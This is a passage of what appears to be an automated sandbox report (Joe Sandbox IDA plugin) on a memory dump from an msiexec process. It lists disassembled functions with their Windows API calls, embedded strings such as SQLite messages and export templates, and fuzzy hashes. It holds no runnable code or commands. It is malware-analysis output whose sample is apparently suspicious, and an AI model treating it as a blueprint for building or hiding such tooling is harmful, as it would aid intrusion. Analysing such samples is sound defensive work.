                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                      • String ID:
                                                                                                      • API String ID: 2047574939-0
                                                                                                      • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                      • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 438689982-4203073231
                                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4281309102-0
                                                                                                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfwcscat
                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                      • API String ID: 384018552-4153097237
                                                                                                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                      • String ID: 0$6
                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                      APIs
                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                      • String ID: 6$\
                                                                                                      • API String ID: 404372293-1284684873
                                                                                                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesErrorFileLastSleep$free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1470729244-0
                                                                                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                      APIs
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1331804452-0
                                                                                                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                      • String ID: advapi32.dll
                                                                                                      • API String ID: 2012295524-4050573280
                                                                                                      • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                      • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf
                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                      • String ID: %2.2X
                                                                                                      • API String ID: 2521778956-791839006
                                                                                                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                      • API String ID: 999028693-502967061
                                                                                                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2350177629-0
                                                                                                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                      • API String ID: 2221118986-1606337402
                                                                                                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                      APIs
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                      • memset.MSVCRT ref: 00409042
                                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 265355444-0
                                                                                                      • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                      • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFilefreememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2507021081-0
                                                                                                      • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                      • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                      APIs
                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 4131324427-0
                                                                                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PathTemp$free
                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                      • API String ID: 924794160-1420421710
                                                                                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                      • String ID: Error$Error %d: %s
